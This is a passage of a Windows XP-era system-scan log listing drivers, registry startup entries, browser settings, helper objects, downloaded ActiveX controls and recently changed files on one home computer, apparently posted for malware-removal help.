(sym_hi) sym_hi [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYM_HI.SYS -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 28384 bytes | Modified Date = 8/17/2001 3:07:40 PM | Attr = ]
(sym_u3) sym_u3 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYM_U3.SYS -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 30688 bytes | Modified Date = 8/17/2001 3:07:42 PM | Attr = ]
(tfsnboio) tfsnboio [File_System | Auto | Running] -> %System32%\dla\tfsnboio.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 25685 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsncofs) tfsncofs [File_System | Auto | Running] -> %System32%\dla\tfsncofs.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 34837 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsndrct) tfsndrct [File_System | Auto | Running] -> %System32%\dla\tfsndrct.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 4117 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsndres) tfsndres [File_System | Auto | Running] -> %System32%\dla\tfsndres.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 2233 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnifs) tfsnifs [File_System | Auto | Running] -> %System32%\dla\tfsnifs.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 83284 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnopio) tfsnopio [File_System | Auto | Running] -> %System32%\dla\tfsnopio.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 14229 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnpool) tfsnpool [File_System | Auto | Running] -> %System32%\dla\tfsnpool.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 6357 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnudf) tfsnudf [File_System | Auto | Running] -> %System32%\dla\tfsnudf.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 98068 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnudfa) tfsnudfa [File_System | Auto | Running] -> %System32%\dla\tfsnudfa.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 100373 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(ultra) ultra [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ULTRA.SYS -> Promise Technology, Inc. [Ver = 1.43 (Build 0603) | Size = 36736 bytes | Modified Date = 8/17/2001 2:52:22 PM | Attr = ]
(VET-FILT) VET File System Filter [Kernel | System | Running] -> %System32%\drivers\Vet-Filt.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 21031 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VET-REC) VET File System Recognizer [Kernel | System | Running] -> %System32%\drivers\Vet-Rec.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 15478 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VETEBOOT) VET Boot Scan Engine [Kernel | On_Demand | Running] -> %System32%\drivers\VetEBoot.sys -> Computer Associates International, Inc. [Ver = 30.8.0.0 | Size = 108624 bytes | Modified Date = 6/20/2007 5:25:08 PM | Attr = ]
(VETEFILE) VET File Scan Engine [Kernel | System | Running] -> %System32%\drivers\VetEFile.sys -> Computer Associates International, Inc. [Ver = 30.8.0.0 | Size = 630432 bytes | Modified Date = 6/20/2007 5:25:08 PM | Attr = ]
(VETFDDNT) VET Floppy Boot Sector Monitor [Kernel | System | Running] -> %System32%\drivers\VetFDDNT.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 15735 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VETMONNT) VET File Monitor [Kernel | System | Running] -> %System32%\drivers\vetmonnt.sys -> Computer Associates International, Inc. [Ver = 7.2.0.0 | Size = 26787 bytes | Modified Date = 7/31/2006 12:56:06 PM | Attr = ]
(W8100PCI) D-Link AirPlus G Wireless Driver [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\MRV8K51.sys -> Marvell Semiconductor, Inc [Ver = 2.03.00.000 built by: WinDDK | Size = 297984 bytes | Modified Date = 1/8/2004 10:46:18 PM | Attr = R ]
(wanatw) WAN Miniport (ATW) [Kernel | On_Demand | Stopped] -> System32\DRIVERS\wanatw4.sys -> File not found
(WDICA) WDICA [Kernel | On_Demand | Stopped] -> -> File not found

[Registry - Non-Microsoft Only]
< Run [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
!AVG Anti-Spyware -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\avgas.exe -> GRISOFT s.r.o. [Ver = 7, 5, 1, 43 | Size = 6731312 bytes | Modified Date = 6/11/2007 4:25:42 AM | Attr = ]
CaAvTray -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 230512 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
CAVRID -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRid.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 185456 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
diagent -> %ProgramFiles%\Creative\SBLive\Diagnostics\diagent.exe -> Creative Technology Ltd [Ver = 1, 1, 4, 0 | Size = 135264 bytes | Modified Date = 4/3/2002 2:01:00 AM | Attr = ]
DwlClient -> %CommonProgramFiles%\Dell\EUSW\Support.exe -> Dell [Ver = 2, 1, 1, 0 | Size = 323584 bytes | Modified Date = 5/27/2004 9:05:42 PM | Attr = ]
iTunesHelper -> %ProgramFiles%\iTunes\iTunesHelper.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 256576 bytes | Modified Date = 10/30/2006 10:36:36 AM | Attr = ]
LogitechVideoRepair -> %ProgramFiles%\Logitech\Video\ISStart.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 458752 bytes | Modified Date = 1/18/2005 5:47:30 PM | Attr = ]
LogitechVideoTray -> %ProgramFiles%\Logitech\Video\LogiTray.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 217088 bytes | Modified Date = 1/18/2005 5:37:30 PM | Attr = ]
NeroFilterCheck -> %System32%\NeroCheck.exe -> Ahead Software Gmbh [Ver = 1, 0, 0, 2 | Size = 155648 bytes | Modified Date = 7/9/2001 10:50:42 AM | Attr = ]
NvCplDaemon -> %System32%\nvcpl.dll [RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup] -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 7286784 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
NvMediaCenter -> %System32%\nvmctray.dll [RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit] -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 86016 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
QuickTime Task -> %ProgramFiles%\QuickTime\qttask.exe -> Apple Computer, Inc. [Ver = 7.1.3 | Size = 282624 bytes | Modified Date = 10/25/2006 7:58:18 PM | Attr = ]
SunJavaUpdateSched -> %ProgramFiles%\Java\jre1.6.0_01\bin\jusched.exe -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 83608 bytes | Modified Date = 3/14/2007 3:43:44 AM | Attr = ]
TkBellExe -> %CommonProgramFiles%\Real\Update_OB\realsched.exe -> RealNetworks, Inc. [Ver = 0.1.0.1622 | Size = 151597 bytes | Modified Date = 3/26/2004 4:10:10 PM | Attr = ]
< OptionalComponents [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\
IMAIL -> Installed = 1 ->
MAPI -> Installed = 1 ->
MSFS -> Installed = 1 ->
< Run [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
LogitechSoftwareUpdate -> %ProgramFiles%\Logitech\Video\ManifestEngine.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 196608 bytes | Modified Date = 1/18/2005 5:07:54 PM | Attr = ]
< Common Startup > -> C:\Documents and Settings\All Users\Start Menu\Programs\Startup
%AllUsersStartup%\Adobe Gamma Loader.lnk -> %CommonProgramFiles%\Adobe\Calibration\Adobe Gamma Loader.exe -> Adobe Systems, Inc. [Ver = 1, 0, 0, 1 | Size = 113664 bytes | Modified Date = 11/4/1999 3:06:48 PM | Attr = ]
%AllUsersStartup%\Adobe Reader Speed Launch.lnk -> %ProgramFiles%\Adobe\Acrobat 7.0\Reader\reader_sl.exe -> Adobe Systems Incorporated [Ver = 7.0.5.2005092300 | Size = 29696 bytes | Modified Date = 9/23/2005 10:05:26 PM | Attr = ]
%AllUsersStartup%\D-Link AirPlus G Configuration Utility.lnk -> %ProgramFiles%\D-Link AirPlus G\AIRPLUS.exe -> D-Link [Ver = 1, 0, 0, 0 | Size = 294912 bytes | Modified Date = 1/6/2004 9:19:38 PM | Attr = ]
%AllUsersStartup%\HotSync Manager.lnk -> %ProgramFiles%\Sony Handheld\HOTSYNC.EXE -> Palm, Inc. [Ver = 4.0.1 | Size = 299008 bytes | Modified Date = 5/31/2001 9:52:46 AM | Attr = ]
%AllUsersStartup%\hp psc 2000 Series.lnk -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 323646 bytes | Modified Date = 4/9/2003 6:41:38 PM | Attr = ]
%AllUsersStartup%\hpoddt01.exe.lnk -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe -> Hewlett-Packard [Ver = 1, 0, 0, 1 | Size = 28672 bytes | Modified Date = 4/9/2003 7:11:12 PM | Attr = ]
%AllUsersStartup%\Sony PDA USB Switcher.lnk -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
%AllUsersStartup%\SonyPDA USB Switcher.lnk -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
< User Startup > -> C:\Documents and Settings\Admin\Start Menu\Programs\Startup
-> %UserStartup%\PowerReg Scheduler V3.exe -> Leader Technologies [Ver = 3,0,0,0 | Size = 225280 bytes | Modified Date = 5/27/2004 11:02:24 PM | Attr = ]
< ShellExecuteHooks [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
{57B86673-276A-48B2-BAE7-C6DBB3020EB8} [HKLM] -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll [AVG Anti-Spyware 7.5] -> GRISOFT s.r.o. [Ver = 7, 5, 1, 36 | Size = 79408 bytes | Modified Date = 5/30/2007 7:29:58 AM | Attr = ]
< SecurityProviders [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\\SecurityProviders
< Winlogon settings [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
< Winlogon settings [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
< CurrentVersion Policy Settings [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveTypeAutoRun -> _
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoCDBurning -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{BDEADF00-C265-11D0-BCED-00A0C90AB50F} -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} -> 1073741857 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{0DF44EAA-FF21-4412-828E-260A8728E7F1} -> 32 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\dontdisplaylastusername -> 0 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticecaption -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticetext -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\shutdownwithoutlogon -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\undockwithoutlogon -> 1 ->
< CurrentVersion Policy Settings [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveTypeAutoRun -> 145 ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\\DisableRegistryTools -> 0 ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\WinOldApp\ -> ->
< HOSTS File > (734 bytes) -> C:\WINDOWS\System32\drivers\etc\Hosts
127.0.0.1 localhost -> ->
< Internet Explorer Settings > ->
HKLM: Default_Page_URL -> http://www.dell4me.com/myway ->
HKLM: Main\\Default_Search_URL -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKLM: Local Page -> %SystemRoot%\system32\blank.htm ->
HKLM: Search Page -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKLM: Start Page -> http://www.dell4me.com/myway ->
HKLM: CustomizeSearch -> http://ie.search.msn.com/en-us/srchasst/srchcust.htm ->
HKLM: SearchAssistant -> http://ie.search.msn.com/en-us/srchasst/srchasst.htm ->
HKCU: Default_Page_URL -> http://www.dell4me.com/myway ->
HKCU: Local Page -> C:\WINDOWS\system32\blank.htm ->
HKCU: Search Bar -> http://g.msn.com/0SEENUS/SAOS01 ->
HKCU: Search Page -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKCU: Start Page -> http://www.yahoo.com/ ->
HKCU: ProxyEnable -> 0 ->
< Trusted Sites > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
msn.com [ - ] -> ->
< BHO's > -> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} [HKLM] -> %ProgramFiles%\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll [Adobe PDF Reader Link Helper] -> Adobe Systems Incorporated [Ver = 7.0.7.2006011200 | Size = 63128 bytes | Modified Date = 1/12/2006 8:38:22 PM | Attr = ]
{53707962-6F74-2D53-2644-206D7942484F} [HKLM] -> %ProgramFiles%\Spybot - Search & Destroy\SDHelper.dll [] -> Safer Networking Limited [Ver = 1, 4, 0, 0 | Size = 853672 bytes | Modified Date = 5/31/2005 1:04:00 AM | Attr = ]
{5CA3D70E-1895-11CF-8E15-001234567890} [HKLM] -> %System32%\dla\tfswshx.dll [DriveLetterAccess] -> Sonic Solutions [Ver = 1.04.05b | Size = 106548 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} [HKLM] -> %ProgramFiles%\Java\jre1.6.0_01\bin\ssv.dll [SSVHelper Class] -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 501400 bytes | Modified Date = 3/14/2007 3:43:40 AM | Attr = ]
< Internet Explorer Extensions [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} [HKLM] -> Reg Data - Key not found [MenuText: Sun Java Console] -> File not found
{6224f700-cba3-4071-b251-47cb894244cd} -> %ProgramFiles%\ICQ\Icq.exe [ButtonText: ICQ Pro] -> ICQ Inc. [Ver = 5,5,6,3916 | Size = 1880639 bytes | Modified Date = 10/14/2003 12:03:50 PM | Attr = ]
{B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} -> %ProgramFiles%\PartyPoker\PartyPoker.exe [ButtonText: PartyPoker.com] -> iGlobalMedia.com [Ver = 1, 0, 0, 1 | Size = 2613248 bytes | Modified Date = 7/8/2005 10:09:02 PM | Attr = ]
< Internet Explorer Plugins [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\Extension\
.spop -> %ProgramFiles%\Internet Explorer\PLUGINS\NPDocBox.dll [Reg Data - Value does not exist] -> Intertrust Technologies, Inc. [Ver = 1.0.0.32 | Size = 270336 bytes | Modified Date = 8/1/2001 5:05:42 PM | Attr = ]
< User Agent Post Platform [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
SV1 -> ->
< DNS Name Servers [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Adapters\
{0581109B-E7CC-4D2F-B921-CCF4FB6790E4} -> (Linksys Wireless-G Portable USB Adapter) ->
{20D39951-162D-4C18-BA0D-C3EEBE0EB3AB} -> (D-Link AirPlus G DWL-G510 Wireless PCI Card) ->
{4B250AFE-87CE-406A-B213-8C7324DF6680} -> (Intel® PRO/100 VE Network Connection) ->
{54C8B121-B672-4595-9CA6-5143E89EBCF9} -> (Linksys Wireless-G Portable USB Adapter) ->
{86F8ED03-8E4A-4B80-9904-0E7D717F5A6F} -> (Linksys Wireless-G Portable USB Adapter) ->
{AAB4CE79-BE6C-443B-B902-938DDEE245DC} -> () ->
{DDE840E8-BF69-465D-9359-CB4DE1510B2C} -> (Linksys Wireless-G Portable USB Adapter) ->
< Winsock2 Catalogs [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\
Protocol_Catalog9\Catalog_Entries\000000000001 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000002 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000003 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000009 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
< Protocol Handlers [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\
ipp -> Reg Data - Key not found -> File not found
lbxfile -> %ProgramFiles%\Libronix DLS\System\FileProt.dll -> Libronix Corporation [Ver = 2.1.90.1 | Size = 184320 bytes | Modified Date = 4/27/2004 2:25:54 AM | Attr = ]
lbxres -> %ProgramFiles%\Libronix DLS\System\ResProt.dll -> Libronix Corporation [Ver = 2.1.93.1 | Size = 131072 bytes | Modified Date = 4/27/2004 2:29:20 AM | Attr = ]
msdaipp -> Reg Data - Key not found -> File not found
< Downloaded Program Files > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\
{33564D57-0000-0010-8000-00AA00389B71} -> - CodeBase = http://download.microsoft.com/download/F/6...922/wmv9VCM.CAB ->
{4C39376E-FA9D-4349-BACC-D305C1750EF3} -> EPUImageControl Class - CodeBase = http://tools.ebayimg.com/eps/wl/activex/eB...l_v1-0-3-30.cab ->
{4F1E5B1A-2A80-42CA-8532-2D05CB959537} -> MSN Photo Upload Tool - CodeBase = http://by103fd.bay103.hotmail.msn.com/resources/MsnPUpld.cab ->
{8AD9C840-044E-11D1-B3E9-00805F499D93} -> Java Plug-in 1.6.0_01 - CodeBase = http://java.sun.com/products/plugin/autodl...indows-i586.cab ->
{8E0D4DE5-3180-4024-A327-4DFAD1796A8D} -> MessengerStatsClient Class - CodeBase = http://messenger.zone.msn.com/binary/Messe...nt.cab31267.cab ->
{A8658086-E6AC-4957-BC8E-8D54A7E8A790} -> GDIChk Object - CodeBase = http://www.microsoft.com/security/controls/GDI/0/GDIChk.CAB ->
{AB86CE53-AC9F-449F-9399-D8ABCA09EC09} -> Get_ActiveX Control - CodeBase = https://h17000.www1.hp.com/ewfrf-JAVA/Secur...loadManager.ocx ->
{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA} -> Java Plug-in 1.6.0_01 - CodeBase = http://java.sun.com/products/plugin/autodl...indows-i586.cab ->
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} -> Java Plug-in 1.6.0_01 - CodeBase = http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab ->
{D1E7CBDA-E60E-4970-A01C-37301EF7BF98} -> Measurement Services Client v.3.7 - CodeBase = http://gameadvisor.futuremark.com/global/msc37.cab ->
{D27CDB6E-AE6D-11CF-96B8-444553540000} -> Shockwave Flash Object - CodeBase = http://download.macromedia.com/pub/shockwa...ash/swflash.cab ->

[Files/Folders - Created Within 90 days]
hiberfil.sys -> %SystemDrive%\hiberfil.sys -> [Ver = | Size = 535875584 bytes | Created Date = 1/1/1601 6:00:00 AM | Attr = HS]
nvapps.xml -> %SystemDrive%\nvapps.xml -> [Ver = | Size = 38905 bytes | Created Date = 6/2/2007 5:12:25 PM | Attr = ]
$NtUninstallKB925902$ -> %SystemRoot%\$NtUninstallKB925902$ -> [Folder | Created Date = 4/4/2007 3:00:57 AM | Attr = H ]
$NtUninstallKB927891$ -> %SystemRoot%\$NtUninstallKB927891$ -> [Folder | Created Date = 5/22/2007 5:13:44 PM | Attr = H ]
$NtUninstallKB929123$ -> %SystemRoot%\$NtUninstallKB929123$ -> [Folder | Created Date = 6/15/2007 2:02:34 AM | Attr = H ]
$NtUninstallKB930178$ -> %SystemRoot%\$NtUninstallKB930178$ -> [Folder | Created Date = 4/12/2007 3:01:11 AM | Attr = H ]
$NtUninstallKB930916$ -> %SystemRoot%\$NtUninstallKB930916$ -> [Folder | Created Date = 5/14/2007 3:02:27 AM | Attr = H ]
$NtUninstallKB931261$ -> %SystemRoot%\$NtUninstallKB931261$ -> [Folder | Created Date = 4/12/2007 3:01:20 AM | Attr = H ]
$NtUninstallKB931768$ -> %SystemRoot%\$NtUninstallKB931768$ -> [Folder | Created Date = 5/14/2007 3:02:44 AM | Attr = H ]
$NtUninstallKB931784$ -> %SystemRoot%\$NtUninstallKB931784$ -> [Folder | Created Date = 4/12/2007 3:02:17 AM | Attr = H ]
$NtUninstallKB932168$ -> %SystemRoot%\$NtUninstallKB932168$ -> [Folder | Created Date = 4/12/2007 3:00:58 AM | Attr = H ]
$NtUninstallKB933566$ -> %SystemRoot%\$NtUninstallKB933566$ -> [Folder | Created Date = 6/15/2007 2:02:51 AM | Attr = H ]
$NtUninstallKB935839$ -> %SystemRoot%\$NtUninstallKB935839$ -> [Folder | Created Date = 6/15/2007 2:00:59 AM | Attr = H ]
$NtUninstallKB935840$ -> %SystemRoot%\$NtUninstallKB935840$ -> [Folder | Created Date = 6/15/2007 2:02:24 AM | Attr = H ]
java.exe -> %System32%\java.exe -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 135168 bytes | Created Date = 6/21/2007 9:25:42 PM | Attr = ]
javacpl.cpl -> %System32%\javacpl.cpl -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 69632 bytes | Created Date = 6/21/2007 9:25:42 PM | Attr = ]
javaw.exe -> %System32%\javaw.exe -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 135168 bytes | Created Date = 6/21/2007 9:25:42 PM | Attr = ]
javaws.exe -> %System32%\javaws.exe -> Sun Microsystems, Inc. [Ver = 6.0.10.6 | Size = 139264 bytes | Created Date = 6/21/2007 9:25:42 PM | Attr = ]
MRT.INI -> %System32%\MRT.INI -> [Ver = | Size = 4701 bytes | Created Date = 4/12/2007 3:02:04 AM | Attr = ]
NvApps.xml -> %System32%\NvApps.xml -> [Ver = | Size = 0 bytes | Created Date = 6/14/2007 7:23:52 PM | Attr = ]
AvgAsCln.sys -> %System32%\drivers\AvgAsCln.sys -> GRISOFT, s.r.o. [Ver = 1.0.0.14 | Size = 10872 bytes | Created Date = 6/21/2007 4:06:47 PM | Attr = ]

[Files/Folders - Modified Within 90 days]
BOOT.INI -> %SystemDrive%\BOOT.INI -> [Ver = | Size = 211 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = RHS]
Documents and Settings -> %SystemDrive%\Documents and Settings -> [Folder | Modified Date = 6/21/2007 5:11:44 PM | Attr = ]
Downloaded Full Apps -> %SystemDrive%\Downloaded Full Apps -> [Folder | Modified Date = 6/2/2007 6:37:18 PM | Attr = ]
hiberfil.sys -> %SystemDrive%\hiberfil.sys -> [Ver = | Size = 535875584 bytes | Modified Date = 6/21/2007 6:59:18 PM | Attr = HS]
hpfr5550.xml -> %SystemDrive%\hpfr5550.xml -> [Ver = | Size = 488 bytes | Modified Date = 5/22/2007 3:05:10 AM | Attr = ]
nvapps.xml -> %SystemDrive%\nvapps.xml -> [Ver = | Size = 38905 bytes | Modified Date = 6/2/2007 6:08:26 PM | Attr = ]
Program Files -> %ProgramFiles% -> [Folder | Modified Date = 6/21/2007 10:18:52 PM | Attr = R ]
WINDOWS -> %SystemRoot% -> [Folder | Modified Date = 6/21/2007 7:07:56 PM | Attr = ]
$hf_mig$ -> %SystemRoot%\$hf_mig$ -> [Folder | Modified Date = 6/14/2007 8:27:48 PM | Attr = H ]
$NtUninstallKB925902$ -> %SystemRoot%\$NtUninstallKB925902$ -> [Folder | Modified Date = 4/4/2007 4:01:00 AM | Attr = H ]
$NtUninstallKB927891$ -> %SystemRoot%\$NtUninstallKB927891$ -> [Folder | Modified Date = 5/22/2007 6:13:46 PM | Attr = H ]
$NtUninstallKB929123$ -> %SystemRoot%\$NtUninstallKB929123$ -> [Folder | Modified Date = 6/15/2007 3:02:38 AM | Attr = H ]
$NtUninstallKB930178$ -> %SystemRoot%\$NtUninstallKB930178$ -> [Folder | Modified Date = 4/12/2007 4:01:14 AM | Attr = H ]
$NtUninstallKB930916$ -> %SystemRoot%\$NtUninstallKB930916$ -> [Folder | Modified Date = 5/14/2007 4:02:28 AM | Attr = H ]
$NtUninstallKB931261$ -> %SystemRoot%\$NtUninstallKB931261$ -> [Folder | Modified Date = 4/12/2007 4:01:22 AM | Attr = H ]
$NtUninstallKB931768$ -> %SystemRoot%\$NtUninstallKB931768$ -> [Folder | Modified Date = 5/14/2007 4:02:48 AM | Attr = H ]
$NtUninstallKB931784$ -> %SystemRoot%\$NtUninstallKB931784$ -> [Folder | Modified Date = 4/12/2007 4:02:20 AM | Attr = H ]
$NtUninstallKB932168$ -> %SystemRoot%\$NtUninstallKB932168$ -> [Folder | Modified Date = 4/12/2007 4:01:00 AM | Attr = H ]
$NtUninstallKB933566$ -> %SystemRoot%\$NtUninstallKB933566$ -> [Folder | Modified Date = 6/15/2007 3:02:56 AM | Attr = H ]
$NtUninstallKB935839$ -> %SystemRoot%\$NtUninstallKB935839$ -> [Folder | Modified Date = 6/15/2007 3:01:00 AM | Attr = H ]
$NtUninstallKB935840$ -> %SystemRoot%\$NtUninstallKB935840$ -> [Folder | Modified Date = 6/15/2007 3:02:26 AM | Attr = H ]
1Way.ini -> %SystemRoot%\1Way.ini -> [Ver = | Size = 315 bytes | Modified Date = 5/10/2007 10:30:36 PM | Attr = ]
BOOTSTAT.DAT -> %SystemRoot%\BOOTSTAT.DAT -> [Ver = | Size = 2048 bytes | Modified Date = 6/21/2007 6:59:22 PM | Attr = S]
